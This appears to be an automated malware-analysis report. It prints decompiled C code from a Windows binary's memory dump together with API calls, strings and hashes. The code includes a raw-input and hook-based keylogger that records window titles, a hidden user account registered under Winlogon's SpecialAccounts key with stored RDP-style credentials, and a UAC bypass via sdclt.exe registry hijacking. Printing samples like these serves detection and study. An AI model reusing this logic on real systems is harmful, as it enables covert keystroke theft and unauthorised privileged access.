													_t124 =  *0x4196a0; // 0x0
													_t126 = E00403261( &_v632);
													_t128 =  *0x4196a0; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x4196a0; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x4196a0; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x4196a0; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x4196a0; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x4196a0; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E004093C8( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E004093C8( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x4196a0; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x4196a0; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											L00405EA5(_v620);
											_v620 = _t198;
											L00405EA5(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				L00405EA5(_t201);
				return _t198;
			}

0x0040903d
0x0040904a
0x0040904e
0x00409056
0x00409059
0x0040905b
0x0040905f
0x00409062
0x0040938b
0x0040938e
0x00409396
0x00409399
0x004093a3
0x004093ab
0x004093b0
0x00409068
0x00409068
0x0040906b
0x00409381
0x00409071
0x00409076
0x00409093
0x004090a1
0x004090a7
0x004090aa
0x004090b9
0x004090bb
0x004090bf
0x004090c1
0x004090c9
0x004090d7
0x004090dd
0x004090e1
0x004090e7
0x004090ee
0x00409105
0x0040910b
0x0040910d
0x0040913b
0x0040910f
0x00409122
0x0040912b
0x0040912b
0x00409147
0x00409155
0x0040915a
0x00409167
0x0040916c
0x00409171
0x00409173
0x00409175
0x00409178
0x00409180
0x0040918c
0x00409191
0x0040919d
0x004091a5
0x004091ae
0x004091b7
0x004091bc
0x004091c9
0x004091d2
0x004091d7
0x004091d7
0x004091dc
0x004091e2
0x004091ee
0x004091f7
0x004091f9
0x004091fe
0x00409239
0x0040923d
0x0040923d
0x00409243
0x00409249
0x0040924e
0x00409200
0x00409214
0x0040921f
0x00409224
0x00409229
0x0040922d
0x0040922f
0x00000000
0x00409231
0x00409231
0x00409231
0x0040922f
0x00409263
0x00409269
0x00409275
0x00409278
0x0040927e
0x00409285
0x00409288
0x0040928f
0x00409296
0x0040929f
0x004092a1
0x004092ac
0x004092b3
0x004092bc
0x004092be
0x004092d0
0x004092d8
0x004092e1
0x004092e3
0x004092e8
0x004092f3
0x004092fa
0x00409303
0x00409305
0x0040930b
0x0040930b
0x00409310
0x00409317
0x00409320
0x00409322
0x00409322
0x0040932c
0x00409343
0x00409343
0x00409346
0x0040934c
0x00409354
0x00409356
0x0040935e
0x0040935e
0x00409368
0x00409371
0x00409375
0x0040937a
0x0040937a
0x004090ee
0x004090e1
0x004090c1
0x00409078
0x0040908a
0x0040908a
0x00409076
0x0040906b
0x004093b8
0x004093c5

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00409084
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090A1
GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090D7
GetForegroundWindow.USER32 ref: 004090F4
GetWindowTextW.USER32 ref: 00409105
lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 004091EE
PostQuitMessage.USER32(00000000), ref: 00409381
RegisterRawInputDevices.USER32 ref: 004093B0

Strings

Unknow, xrefs: 00409132

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
String ID: Unknow
API String ID: 3853268301-1240069140
Opcode ID: 97218042f34cbcaa08f78978d9bcd463188ea84f8a759b32cb085fe5971412ee
Instruction ID: 9779d0e792247a9e55b3318ab2f410e550cd0691825362868d8aeff0002b904c
Opcode Fuzzy Hash: 97218042f34cbcaa08f78978d9bcd463188ea84f8a759b32cb085fe5971412ee
Instruction Fuzzy Hash: DFA18C71100200AFC700DF65DC89DAB7BA8FF89344F44853EF949A72A2D739AD14CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3FA, Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 237
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3FA(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x54e020,  &_v44, _t115 << 2));
				EnterCriticalSection(0x54e020);
				_t167 = _a4;
				_t111 = _a8;
				 *0x54e084 = _a4;
				 *0x54e078 = 0x54d000;
				 *0x54e074 = _a8;
				if(E0040DE1F(_t161) == 0) {
					_t51 = E0040F51D();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00404F2B(_t167, E00404B91( &_v36, 2, 0x54e07c, 0x54e080));
						E00404B6E( &_v36);
						LeaveCriticalSection(0x54e020);
						__eflags = 0;
						return 0;
					}
					_t56 = E0040F4CE();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0040FBFC() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E00403437(0x54e07c, E004034A7( &_a4, _t162, __eflags));
						L00405EA5(_a4);
						_t163 = 8;
						E00403437(0x54e080, E004034A7( &_a4, _t163, __eflags));
						L00405EA5(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x54e07c, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0040D418(0x54e07c, 0x54e080);
						__eflags = _t70;
						if(_t70 != 0) {
							E0041165B(_a8, _t163, E004035E5( &_a4, L"rudp"), 0x54e07c);
							L00405EA5(_a4);
							E0041165B(_a8, _t163, E004035E5( &_a8, L"rpdp"), 0x54e080);
							L00405EA5(_a8);
							E00401F4B(0x54e038, E0040E2E7, 0x54e020);
							LeaveCriticalSection(0x54e020);
							return 1;
						}
						E00404F2B(_t167, E00404B91( &_v36, 9, 0x54e07c, 0x54e080));
						E00404B6E( &_v36);
						L12:
						LeaveCriticalSection(0x54e020);
						return _t172;
					}
					E00404F2B(_t167, E00404B91( &_v36, 1, 0x54e07c, 0x54e080));
					E00404B6E( &_v36);
					_t172 = 0;
					goto L12;
				}
				E00403437(0x54e07c, L0041168E(_t111, _t161,  &_a8, E004035E5( &_a4, L"rudp")));
				L00405EA5(_a8);
				_a8 = 0;
				L00405EA5(_a4);
				E00403437(0x54e080, L0041168E(_t111, _t161,  &_a8, E004035E5( &_a4, L"rpdp")));
				L00405EA5(_a8);
				_a8 = 0;
				L00405EA5(_a4);
				if(E00403261(0x54e07c) != 0 || E00403261(0x54e080) != 0) {
					E00404F2B(_t167, E00404B91( &_v36, 8, 0x54e07c, 0x54e080));
					E00404B6E( &_v36);
				} else {
					_t104 = E004035E5( &_a4, 0x414648);
					E00404F2B(_t167, E00404B91( &_v36, 8, E004035E5( &_a8, 0x414648), _t104));
					E00404B6E( &_v36);
					L00405EA5(_a8);
					_a8 = 0;
					L00405EA5(_a4);
				}
				_t172 = 1;
				goto L12;
			}

0x0040e3fa
0x0040e407
0x0040e40f
0x0040e41e
0x0040e42a
0x0040e430
0x0040e433
0x0040e436
0x0040e43c
0x0040e446
0x0040e453
0x0040e554
0x0040e559
0x0040e55c
0x0040e6cf
0x0040e6e6
0x0040e6ee
0x0040e6f4
0x0040e6fa
0x00000000
0x0040e6fa
0x0040e562
0x0040e567
0x0040e569
0x00000000
0x00000000
0x0040e574
0x0040e577
0x0040e5a6
0x0040e5b5
0x0040e5bd
0x0040e5c4
0x0040e5d5
0x0040e5dd
0x0040e5e5
0x0040e5ff
0x0040e60a
0x0040e61a
0x0040e623
0x0040e62f
0x0040e634
0x0040e636
0x0040e683
0x0040e68b
0x0040e6a1
0x0040e6a9
0x0040e6be
0x0040e6c4
0x00000000
0x0040e6cc
0x0040e64b
0x0040e653
0x0040e658
0x0040e65e
0x00000000
0x0040e664
0x0040e590
0x0040e598
0x0040e59d
0x00000000
0x0040e59d
0x0040e478
0x0040e480
0x0040e48a
0x0040e48d
0x0040e4b3
0x0040e4bb
0x0040e4c3
0x0040e4c6
0x0040e4d7
0x0040e53f
0x0040e547
0x0040e4e4
0x0040e4ed
0x0040e50a
0x0040e512
0x0040e51a
0x0040e522
0x0040e525
0x0040e525
0x0040e54e
0x00000000

APIs

InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E407
DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E41E
EnterCriticalSection.KERNEL32(0054E020,?,?), ref: 0040E42A

Part of subcall function 0040DE1F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0054E020,?,?,0040E451,?,?), ref: 0040DE51

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E5FF
RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E61A
RegCloseKey.ADVAPI32(?,?,?), ref: 0040E623
LeaveCriticalSection.KERNEL32(0054E020,00000000,0054E07C,0054E080,?,?), ref: 0040E65E

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00403261: lstrlenW.KERNEL32(74B60770,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00403268

LeaveCriticalSection.KERNEL32(0054E020,00000000,rpdp,0054E080,00000000,rudp,0054E07C,0054E07C,0054E080,?,?), ref: 0040E6C4
LeaveCriticalSection.KERNEL32(0054E020,00000000,?,?), ref: 0040E6F4

Strings

rudp, xrefs: 0040E459, 0040E670
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, xrefs: 0040E5F5
|T, xrefs: 0040E4CB
T, xrefs: 0040E6AE
8T, xrefs: 0040E6B3
T, xrefs: 0040E658
T, xrefs: 0040E424
rpdp, xrefs: 0040E492, 0040E691
|T, xrefs: 0040E5B0
|T, xrefs: 0040E473
T, xrefs: 0040E413

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$Leavelstrlen$CloseCreateDeleteDispatcherEnterExceptionFreeInitializeOpenUserValueVirtuallstrcpy
String ID: T$ T$ T$ T$8T$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp$|T$|T$|T
API String ID: 122403018-3123880581
Opcode ID: b111ec16c95af9687f7c5752c7cf8c52d499c0504a9141d4e7988330cd79ed2c
Instruction ID: 34b65afe6731ba6ecc596c756d3df6cf655f2d54d3c1a9bc6dda8ec2e9e85144
Opcode Fuzzy Hash: b111ec16c95af9687f7c5752c7cf8c52d499c0504a9141d4e7988330cd79ed2c
Instruction Fuzzy Hash: BE7185706001147BDB14BF62DC5AEEE7B68BF98318B00443EF519B61D1DF7CAA05CA58

Uniqueness

Uniqueness Score: -1.00%

Function 004095AA, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214
windowstringregistryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004095AA(void* __ecx, void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				char _v724;
				struct tagMSG _v748;
				struct _WNDCLASSW _v788;
				struct _SYSTEMTIME _v804;
				char _v808;
				void* _v812;
				long _v816;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				struct HWND__* _t69;
				int _t73;
				intOrPtr _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t107;
				void* _t110;
				struct HINSTANCE__* _t111;
				struct HWND__* _t112;
				void* _t114;
				signed int _t119;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t129;
				intOrPtr _t131;
				void* _t132;
				void* _t133;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				void* _t150;

				_t114 = __ecx;
				_t111 = GetModuleHandleA(0);
				_v788.hIcon = 0;
				_v804.wSecond = 0;
				asm("xorps xmm0, xmm0");
				asm("stosd");
				asm("movlpd [esp+0x30], xmm0");
				asm("movlpd [esp+0x3c], xmm0");
				asm("stosd");
				asm("movlpd [esp+0x44], xmm0");
				asm("stosd");
				asm("stosd");
				_t46 =  *0x4196a0; // 0x0
				E00401052(_t46 + 0x210, 0, 0x800);
				_t49 =  *0x4196a0; // 0x0
				E00401052(_t49 + 0x10, 0, 0x208);
				_t52 =  *0x4196a0; // 0x0
				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
				_t54 =  *0x4196a0; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
				_t57 =  *0x4196a0; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
				_t60 =  *0x4196a0; // 0x0
				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
					E00401052( &_v544, 0, 0x208);
					_t99 =  *0x4196a0; // 0x0
					_t150 = _t150 + 0xc;
					lstrcpyW( &_v544, _t99 + 0x10);
					lstrcatW( &_v544, "*");
					E004035E5(_t150,  &_v544);
					_t107 = L0040FF27( &_v724, _t153, _t114);
					_t129 =  *0x4196a0; // 0x0
					E00401BED(_t129 + 0xa18, _t153, _t107);
					_t131 = _v748.pt;
					_t154 = _t131;
					if(_t131 != 0) {
						E00401AD5(_t131, _t131);
					}
				}
				_t132 = 4;
				_t143 = E004034A7( &_v808, _t132, _t154);
				E00403335(E0040346A( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
				L00405EA5(_v816);
				_t65 =  *0x4196a0; // 0x0
				_v816 = 0;
				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x4196a0; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E0040346A(E0040346A(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x4196a0; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
					_t125 =  *0x4196a0; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
				}
				_v788.lpszClassName = _v812;
				_v788.lpfnWndProc = E0040902E;
				_v788.hInstance = _t111;
				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
				_t119 = 7;
				_t112 = _t69;
				memset( &_v748, 0, _t119 << 2);
				_t73 = GetMessageA( &_v748, _t112, 0, 0);
				if(_t73 == 0) {
					L9:
					_t144 = _v748.wParam;
					goto L10;
				} else {
					_t144 = _t143 | 0xffffffff;
					while(_t73 != _t144) {
						TranslateMessage( &_v748);
						DispatchMessageA( &_v748);
						_t73 = GetMessageA( &_v748, _t112, 0, 0);
						if(_t73 != 0) {
							continue;
						}
						goto L9;
					}
					L10:
					L00405EA5(_v812);
					return _t144;
				}
			}

0x004095aa
0x004095c2
0x004095c4
0x004095ca
0x004095d2
0x004095d5
0x004095db
0x004095e1
0x004095e7
0x004095e8
0x004095ee
0x004095ef
0x004095f0
0x004095fe
0x00409603
0x00409615
0x0040961a
0x0040961f
0x0040962b
0x00409631
0x00409645
0x00409647
0x00409651
0x00409657
0x0040965c
0x00409662
0x00409672
0x00409677
0x0040967c
0x0040968b
0x0040969e
0x004096ab
0x004096b4
0x004096ba
0x004096c7
0x004096cc
0x004096d0
0x004096d2
0x004096d5
0x004096d5
0x004096d2
0x004096dc
0x004096ef
0x004096f9
0x00409702
0x00409707
0x0040970c
0x00409716
0x00409721
0x00409758
0x0040975e
0x0040976b
0x0040976f
0x0040977d
0x00409782
0x0040979a
0x004097a0
0x004097a7
0x004097aa
0x004097aa
0x004097b4
0x004097bd
0x004097c5
0x004097c9
0x004097e1
0x004097e9
0x004097ea
0x004097f4
0x00409802
0x00409806
0x00409835
0x00409835
0x00000000
0x00409808
0x00409808
0x0040980b
0x00409814
0x0040981f
0x0040982f
0x00409833
0x00000000
0x00000000
0x00000000
0x00409833
0x00409839
0x0040983d
0x0040984a
0x0040984a

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004095BC
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 0040962B
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00409645
CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00409651
lstrcpyW.KERNEL32 ref: 0040968B
lstrcatW.KERNEL32(?,00414A58), ref: 0040969E

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 0040FF27: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0040FF54

GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00409721
wsprintfW.USER32 ref: 00409758
CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 0040979A
CloseHandle.KERNEL32(00000000), ref: 004097AA
RegisterClassW.USER32 ref: 004097C9
CreateWindowExW.USER32 ref: 004097E1
GetMessageA.USER32 ref: 00409802
TranslateMessage.USER32(?), ref: 00409814
DispatchMessageA.USER32 ref: 0040981F
GetMessageA.USER32 ref: 0040982F

Strings

ExplorerIdentifier, xrefs: 004096E6
\Microsoft Vision\, xrefs: 0040963F
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00409752

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Message$Create$FileHandlelstrcatlstrlen$ClassCloseDirectoryDispatchDispatcherExceptionFindFirstFolderLocalModulePathRegisterTimeTranslateUserWindowlstrcpywsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
API String ID: 3509704836-2372768292
Opcode ID: d9790d23c18fba8f81df9f660c5fc4e6834428bff6dbe8398a263fb1c58e7a91
Instruction ID: 39917dbe05b92edb34d852007e222ad395107d7940ebd828c0aa0b94b9005c6a
Opcode Fuzzy Hash: d9790d23c18fba8f81df9f660c5fc4e6834428bff6dbe8398a263fb1c58e7a91
Instruction Fuzzy Hash: B0718CB2504304ABC710DFA5DC49EAB77ECFB89704F00892EF589E6291DA39D944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00411AB9, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90
sleepregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00411AB9(void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				char _v1616;
				short* _t53;

				if(E0040FBFC() != 1) {
					CloseHandle( *0x4198b8);
					_v8 = 0;
					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
					if(_v8 != 0) {
						_t47 =  &_v12;
						L0040F7E0( &_v12);
					}
					E004118BA();
					E00401052( &_v1616, 0, 0x400);
					GetModuleFileNameA(0,  &_v1616, 0x400);
					E00411855(_t47, 0x416056,  &_v1616);
					E00411855(_t47, "DelegateExecute", 0x416056);
					GetSystemDirectoryW( &_v592, 0x104);
					lstrcatW( &_v592, L"\\sdclt.exe");
					_t53 = L"open";
					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
					asm("movaps xmm0, [0x417570]");
					_v72.lpFile =  &_v592;
					_v72.cbSize = 0x3c;
					_v72.fMask = 0x40;
					_v72.hwnd = 0;
					_v72.lpVerb = _t53;
					asm("movups [ebp-0x30], xmm0");
					ShellExecuteExW( &_v72);
					TerminateProcess(_v72.hProcess, 0);
					if(_v8 != 0) {
						L0040F7B9( &_v12);
					}
					Sleep(0x7d0);
					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
					ExitProcess(0);
				}
				return 0;
			}

0x00411acc
0x00411ad8
0x00411ae4
0x00411aee
0x00411af7
0x00411af9
0x00411afc
0x00411afc
0x00411b01
0x00411b14
0x00411b25
0x00411b38
0x00411b43
0x00411b57
0x00411b69
0x00411b79
0x00411b81
0x00411b87
0x00411b94
0x00411b9b
0x00411ba2
0x00411ba9
0x00411bac
0x00411baf
0x00411bb3
0x00411bbd
0x00411bc6
0x00411bcb
0x00411bcb
0x00411bd5
0x00411be5
0x00411bec
0x00411bec
0x00411bf7

APIs

Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,74B60770,00000000,74B60770,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
Part of subcall function 0040FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040FC48

CloseHandle.KERNEL32(?,00000000), ref: 00411AD8
GetCurrentProcess.KERNEL32(?), ref: 00411AE7
IsWow64Process.KERNEL32(00000000), ref: 00411AEE
GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 00411B25
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00411B57
lstrcatW.KERNEL32(?,\sdclt.exe), ref: 00411B69
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B81
ShellExecuteExW.SHELL32(?), ref: 00411BB3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00411BBD
Sleep.KERNEL32(000007D0), ref: 00411BD5
RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00411BE5
ExitProcess.KERNEL32 ref: 00411BEC

Strings

<, xrefs: 00411B9B
\sdclt.exe, xrefs: 00411B5D
Software\Classes\Folder\shell\open\command, xrefs: 00411BDB
open, xrefs: 00411B79, 00411B7F
DelegateExecute, xrefs: 00411B3E
@, xrefs: 00411BA2

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
API String ID: 368901745-2081737068
Opcode ID: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
Instruction ID: 72994b68b8d2737cdcda42cc23d7f68f865ca3c4a3f3ee0d868a1c5545f4d225
Opcode Fuzzy Hash: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
Instruction Fuzzy Hash: 75317EB1C01118BBDB10ABA1DC48EDEBB7CEF85315F1080B6FA09A2160D7385A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040882F, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135
windowstringfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040882F(void* __edx, void* __eflags) {
				short _v176;
				struct tagMSG _v204;
				void* _v208;
				struct _SYSTEMTIME _v228;
				struct HINSTANCE__* _t19;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t40;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				void* _t59;
				struct HINSTANCE__* _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t90;

				_t90 = __eflags;
				_t71 = __edx;
				_t19 = GetModuleHandleA(0);
				_t62 =  *0x4196a0; // 0x0
				_t60 = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00401052(_t62 + 0x210, 0, 0x800);
				_t22 =  *0x4196a0; // 0x0
				E00401052(_t22 + 0x10, 0, 0x208);
				_t25 =  *0x4196a0; // 0x0
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
				_t27 =  *0x4196a0; // 0x0
				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x4196a0; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x4196a0; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E004032FF(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x4196a0; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x4196a0; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E00411E21("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E004109D2(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x41969c; // 0x0
				} else {
					_push(_t68);
					_t50 = E00410969(_t49, "SetWindowsHookExA", _t91);
					 *0x41969c = _t50;
				}
				 *_t50(0xd, E004089C0, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}

0x0040882f
0x0040882f
0x00408840
0x00408846
0x00408850
0x0040885a
0x00408860
0x00408861
0x00408862
0x00408867
0x0040886c
0x0040887e
0x00408883
0x00408894
0x0040889a
0x004088ae
0x004088b5
0x004088e9
0x004088f7
0x00408900
0x00408902
0x00408908
0x0040890f
0x00408914
0x0040892c
0x00408932
0x00408939
0x0040893c
0x00408946
0x00408956
0x00408958
0x0040895d
0x0040895f
0x00408976
0x00408961
0x00408961
0x00408969
0x0040896f
0x0040896f
0x00408984
0x004089a7
0x00408996
0x004089a1
0x004089a1
0x004089bd

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00408840
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408894
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 004088AE
GetLocalTime.KERNEL32(?), ref: 004088B5
wsprintfW.USER32 ref: 004088E9
lstrcatW.KERNEL32(-00000010,?), ref: 00408900
CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 0040892C
CloseHandle.KERNEL32(00000000), ref: 0040893C

Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,0041349D), ref: 00411E4E
Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,0041349D), ref: 00411E72
Part of subcall function 00411E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,0041349D), ref: 00411E7F

Part of subcall function 004109D2: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,?,?,?,?,?,00000000), ref: 004109FE

GetMessageA.USER32 ref: 004089AF

